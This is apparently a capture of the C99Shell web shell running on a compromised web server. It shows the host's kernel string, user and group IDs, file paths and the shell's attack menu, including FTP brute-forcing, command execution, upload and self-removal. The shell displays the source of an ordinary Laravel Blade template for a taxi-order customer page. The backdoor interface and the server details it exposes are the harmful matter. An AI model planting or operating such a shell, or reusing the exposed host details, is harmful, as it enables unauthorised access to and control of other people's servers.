!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/resources/views/customer/   drwxr-xr-x
Free 26.6 GB of 117.98 GB (22.55%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     index.blade.php (8.21 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.admin')
@section('page-title')
    {{__('Taxi Order')}}
@endsection
@push('script-page')
@endpush
@section('breadcrumb')
    <li class="breadcrumb-item"><a href="{{route('dashboard')}}">{{__('Dashboard')}}</a></li>
    <li class="breadcrumb-item">{{__('Taxi Order')}}</li>
@endsection
@section('action-btn')
    <div class="float-end">

        <a href="{{ route('order.request.create.customer') }}"   title="{{__('Create')}}" data-title="{{__('Create New Order')}}"  class="btn btn-sm btn-primary">
            <i class="ti ti-plus"></i>
        </a>

    </div>
@endsection

@section('content')

<div class="row">
    <div class="col-xl-6 col-md-6">
        <div class="card card-stats">
            <div class="card-body">
                <div class="row">
                    <div class="col">
                        <h6 class="text-muted mb-1">Total Completed Order</h6>
                        <br>
                        <h4 class="text-muted mb-1">Today</h4>
                        <span class="h6 font-weight-bold mb-0 ">{{isset($todays_orders)?$todays_orders:'0'}}</span> <br>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="col-xl-6 col-md-6">
        <div class="card card-stats">
            <div class="card-body">
                <div class="row">
                    <div class="col">
                        <h6 class="text-muted mb-1">Total Order Completed</h6>
                        <br>
                        <h4 class="text-muted mb-1">All</h4>
                        <span class="h6 font-weight-bold mb-0 ">{{isset($all_orders)?$all_orders:'0'}}</span> <br>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

    <div class="row">
        <div class="col-xl-12">
            <div class="card">
                <div class="card-body table-border-style">
                    <div class="table-responsive">
                        <table class="table datatable">
                            <thead>
                            <tr>
                                <th>{{__('Destination')}}</th>
                                <th>{{__('Total Cost')}}</th>
                                <th>{{__('Transaction Id')}}</th>
                                <th>{{__('Payment Details')}}</th>
                                <th>{{__('Status')}}</th>
                                <th>{{__('Action')}}</th>
                            </tr>
                            </thead>
                            <tbody>
                                @if ($texiorders->isNotEmpty())
                                @foreach ($texiorders as $taxiOrder)
                            <tr class="font-style">
                                <td>
                                    <div class="destination-sec">
                                        <div class="pick-up-address">
                                            <strong>{{__('From')}} :</strong> {{isset($taxiOrder->pickup_address)?$taxiOrder->pickup_address:''}}
                                        </div>
                                        <div class="destination-address">
                                            <strong>{{__('To')}} :</strong> {{isset($taxiOrder->destination_address)?$taxiOrder->destination_address:''}}

                                        </div>
                                        <div class="destination-address">
                                            <strong>{{__('Total Meterage')}} :</strong> {{isset($taxiOrder->total_km)?$taxiOrder->total_km:''}}

                                        </div>
                                    </div>
                                </td>
                                <td>
                                    @if (isset($taxiOrder->total_cost) && $taxiOrder->total_cost)
                                        {{\Auth::user()->priceFormat($taxiOrder->total_cost)}}
                                    @endif
                                </td>
                                <td>{{isset($taxiOrder->trx_id)?$taxiOrder->trx_id:''}}</td>
                                <td>
                                    <div class="driver-status-section">

                                        <div class="payment-status">
                                            <strong>{{__('Payment Status')}} : </strong>
                                            @if ($taxiOrder->payment_status=='paid')
                                            <span class="text-primary">{{ucfirst($taxiOrder->payment_status)}}</span>
                                            @else
                                            <span class="text-danger">{{ucfirst($taxiOrder->payment_status)}}</span>
                                            @endif
                                        </div>
                                        <div class="payment-method">
                                            <strong>{{__('Payment Method')}} : </strong>
                                            @if ($taxiOrder->payment_type=='offline')
                                            <span class="text-primary">{{__('Zell/Cash')}}</span>
                                            @else
                                            <span class="text-danger">{{ucfirst($taxiOrder->payment_type)}}</span>
                                            @endif
                                        </div>
                                    </div>
                                </td>

                                <td>
                                 <div class="driver-status-section">
                                        @if (isset($taxiOrder->status) && $taxiOrder->status)
                                            @if($taxiOrder->status=='accepted')
                                            <span class="text-primary">{{"Accepted By ".$taxiOrder->driver->name}}</span>
                                            @elseif ($taxiOrder->status=='pushed')
                                            <span class="text-primary">{{__('Pushed To Nearest Driver')}}</span>
                                            @else
                                            <span class="badge badge-danger">{{ucfirst($taxiOrder->status)}}</span>
                                            @endif
                                        @endif
                                    </div>
                                </td>

                                    <td class="Action">
                                        @if($taxiOrder->status !='accepted')
                                            <div class="action-btn bg-info ms-2">
                                                <a href="{{ route('taxi.order.request.customer.edit',$taxiOrder->id) }}" class="mx-3 btn btn-sm  align-items-center" data-bs-toggle="tooltip" title="{{__('Edit')}}">
                                                    <i class="ti ti-pencil text-white"></i>
                                                </a>
                                            </div>
                                            @endif
                                            <div class="action-btn bg-danger ms-2">
                                                {!! Form::open(['method' => 'DELETE', 'route' => ['taxi.order.request.customer.destroy', $taxiOrder->id],'id'=>'delete-form-'.$taxiOrder->id]) !!}
                                                <a href="#" class="mx-3 btn btn-sm  align-items-center bs-pass-para" data-bs-toggle="tooltip" title="{{__('Delete')}}" ><i class="ti ti-trash text-white"></i></a>
                                                {!! Form::close() !!}
                                            </div>

                                    </td>


                            </tr>
                            @endforeach
                            @else
                            <tr class="font-style text-center">
                                <td colspan="6">
                                    No Data Available
                                </td>
                            </tr>
                        @endif

                            </tbody>
                        </table>
                    </div>
                </div>
            </div>
        </div>
    </div>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--